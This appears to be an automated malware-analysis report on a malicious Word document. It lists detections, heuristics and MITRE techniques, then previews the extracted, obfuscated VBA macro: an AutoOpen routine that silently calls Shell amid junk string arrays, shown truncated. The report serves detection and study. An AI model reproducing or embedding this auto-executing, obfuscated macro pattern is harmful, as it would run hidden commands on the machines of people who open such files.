MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains a malicious VBA macro with an AutoOpen subroutine that calls the Shell function. This indicates the macro is designed to execute arbitrary commands, likely to download and run a second-stage payload. The presence of the `jAu+jAugjAu` URL is suspicious and may be related to the payload delivery. The ClamAV detection `Img.Dropper.PhishingLure-6443153-0` further supports its malicious nature.
Heuristics 8
-
ClamAV: Img.Dropper.PhishingLure-6443153-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Img.Dropper.PhishingLure-6443153-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 183,808 bytes but its declared streams total only 103,988 bytes — 79,820 bytes (43%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://jAu+jAugjAu In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 34623 bytes |
SHA-256: a2bcf12ef450eece1e6fa0455ed125cb60f925a18db241f25d3940ff88f6ab60 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "hmWNzfA"
Sub AutoOpen()
udJwaCbpSAHpKA = Array(UCase("oYUZFmoOQnUHVf" + "DWYZFHuQlfr" + "CkBMPRsupzdnKG" + "tKGuFKqzl" + "kvmuIjuNr"))
iObEpdllDtkP = Array(UCase("tBFikllLmQufVF" + "hQjaSVk" + "jCEcZFtshUz" + "sCFJcGZrwjYUXk" + "nJKwcJW"))
bjIMGsXNLY = Array(UCase("HiKazMws" + "CikFoAGiWXU" + "WjddTuSzaTNv" + "cacjMkjQ" + "TzvCXFmoqoDbl"))
hwdSdsFjRouMad = Array(UCase("KnnTjNfhRWMMlc" + "sjqcvmiRDX" + "kjGILfIpjAPH" + "jBOMwQj" + "GswKVwiMbV"))
vvdwbILhEwwX = Array(UCase("blsuXVVnrQd" + "JzqjadFffMJGC" + "EkibXKUUjjFno" + "AzDizKR" + "VBdSrszP"))
mrkRkEQtTUp = Array(UCase("GbmpzihIi" + "sVtPhwET" + "WTHSwDoQsnl" + "pbwOZqdrOPG" + "fzOYUXRpAtTuzI"))
VBA.Shell$ GroQSZEWTizL, 0
lLNpUtaCtwBIH = Array(UCase("bMHMJnwpPwV" + "vfwIBOQAsj" + "alDEzUb" + "PKOZjLhqV" + "wvRTzzvFlumrGi"))
LjbFizUndGKhGQ = Array(UCase("UYuGvlkGmGJrjh" + "XEfiUiGknuc" + "oNoQpooa" + "wznJbaozZ" + "kGwiGCbv"))
NoHMTdvsw = Array(UCase("TDvGSaEsVtERk" + "mrBrfhNNt" + "MZpnTffiqJ" + "EoziHCK" + "COvEtab"))
EMQcFJZuslR = Array(UCase("pOVbaHhCBM" + "fDHrHQVvMr" + "aVahzuP" + "mVllQns" + "dmsZbsolYz"))
SdXqEjmnz = Array(UCase("sImnwaC" + "RrDPvrJUScihoI" + "cwbPfhE" + "AsUkdFlfRmr" + "GPChfhjO"))
End Sub
Function XhjTwHsqFVhv()
FbAup = Array(UCase("VQILuJKvMcuuDQ" + "rKBLYsWFLjSDC" + "KvfMHQbm" + "rRzuSZBMjH" + "iFOaJGwKzbcGIn"), UCase("jOivzOE" + "JtawEjJXivGdE" + "EDBSQpuPLpGQ" + "nioIiZREjiIui" + "EtKCJwzJiuhzO"))
WuRFjiLSwS = Mid("NWXnEMczPmoDw nlocFBAzlEHoLui", 14, 3)
NsvwkztJEv = Array(UCase("PFkYTDcpUipA" + "GIXAzwzKwzcW" + "ovSwOnBAHkjNoJ" + "IPLjkKHNRpHwz" + "SHICXOhWXP"), UCase("wjzYnnL" + "KChmsmljiBHHq" + "aocbLQu" + "lrvhlaIp" + "BwHmXlVQPlh"))
BsGWzsW = Array(UCase("uilrnnWtunXDnb" + "VtXmBqVAnz" + "tdztakLXKw" + "QGqRLzXiGJYlIB" + "KMDYhzuT"), UCase("stAMnsQRZYcRvk" + "WdJrKVsqsRZ" + "TlRwVnwYSwKqNt" + "LkYsPcY" + "DoDIYAC"))
YbRQddN = Array(UCase("RWVqAjLIQTtS" + "wMMjdcJOKaL" + "zbvEdTFuHZ" + "rNTTiSibj" + "VdCctmVYSGvKT"), UCase("IQDnAnX" + "YwVVJIavc" + "biiwtcjhkWpSUh" + "TLRPvawQCEGHYc" + "zWiwjkVJ"))
UPzZhC = Mid("PjALUntqtEqiXO", 10, 1)
vUpdTzp = Array(UCase("uNtwjIZH" + "wLMXSSdROjG" + "YKWuiNKRiY" + "PrPdUwaCKQ" + "QQMikVarK"), UCase("vnWCWBzvPp" + "anzjCpIVoivDKu" + "iEcormN" + "TDtawud" + "vbOpdPwh"))
CEcsXMvWAht = Array(UCase("bDTDBdFboa" + "zJjhYiScunUKE" + "YToYzKzCuo" + "HtOZwiTzlPoqw" + "ERtPkGsOfd"), UCase("RCqQsuOr" + "RlECvIBNTHjcr" + "tsEnKiw" + "NkPhcdhsUZwGG" + "NqTbFfvYu"))
fdTpmj = Array(UCase("tsHNZjlEz" + "WYmjjFpzohh" + "SUOOuGrc" + "KTDbQJSAQWkHh" + "YNHFXKMHiilZnw"), UCase("oiNWmMFj" + "TvXwYLzA" + "ZpBmBTSfCoUp" + "WTpbsWkuhTizl" + "mOiTlloNJJB"))
zHLKwaUPYww = Mid("sRaHHAoIz plDTKYvOfvTDwRHFrOZfBzz", 10, 1)
viNkbt = Array(UCase("ZBzXoHEJrYYT" + "OfYjamJiluZfO" + "icTzpqiHbf" + "ENVoOhuu" + "FwhzVlk"), UCase("nGXsZnV" + "YbicEGEsWVZo" + "XNilMOmvTcEGj" + "UIRfazHpGM" + "zzroczLwM"))
FOSSOkuXdd = Array(UCase("uEHJQOSdZEI" + "SaPqsWXnPrfQTV" + "DCIKjZPcfnYC" + "hIChFmAKV" + "VmlOMCYqpvfOaQ"), UCase("bXDwkDUUIGHpwL" + "UYhFnXuKCaGw" + "GjShmniOzMlt" + "RdIFNaf" + "bHjVcWhM"))
lJwYljD = Array(UCase("EdmHjVaJS" + "LZvDYfq" + "ZRjEOzkwEMt" + "DPzjcPH" + "fcdLpQGsYK"), UCase("AjUMDiz" + "nXjROPOww" + "MaJXTzznVPw" + "rXuLtUiDuAcAU" + "vLPwaRK"))
krKDK = Mid("TT kmrNSRWazmZzNAOIRmkmimGwBJFcQVrrbh", 3, 2)
BszmWV = Array(UCase("XdGlNYn" + "CLhSWLwLlF" + "CzNjRaibl" + "JQwCzpIn" + "EEUfKPwpF"), UCase("kKrRQKDKzpLjzC" + "sukQZVnYV" + "MhRCQTl" + "iABSwjstfL" + "EUHSSSUOYjazmV"))
PYSGXV = Array(UCase("LjrcQXOPN" + "PufLWCWtPshL" + "IDTBmYZohibLKU" + "ELofmslaV" + "oNZhBRiAljZz"), UCase("crowiLDzMh" + "pEECYFW" + "wSzKzHfRsLY" + "rGpLnwwDORjb" + "TrzMjbjMvzD"))
XXPbCtwBA = Array(UCase("qiaGhSUEFTbs" + "kKqBRUn" + "VurjqZufi" + "AEdzjvw" + "PLYAYPSfz"), UCase("OJSznSUnjXqtZY" + "TaoblbvCzF" + "uVVbQLbzRZi" + "QLiwMbc" + "lzdFpiELTT"))
ZFIzh = Mid("XaiBYstNeHYjolZkDbRXiokOFzjwWjQNZcqpo", 9, 1)
IvXOfu = Array(UCase("jppCuLoowOi" + "tOaJTPhiV" + "jPiELksYvHm" + "HJHATFvnjEI" + "TRAWtjSUJBIZ"), UCase("qzDwXTacNH" + "CSvbmivbH" + "ltjVfOp" + "WFAhfdFsq" + "khFFKjUa"))
zTFDIT
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.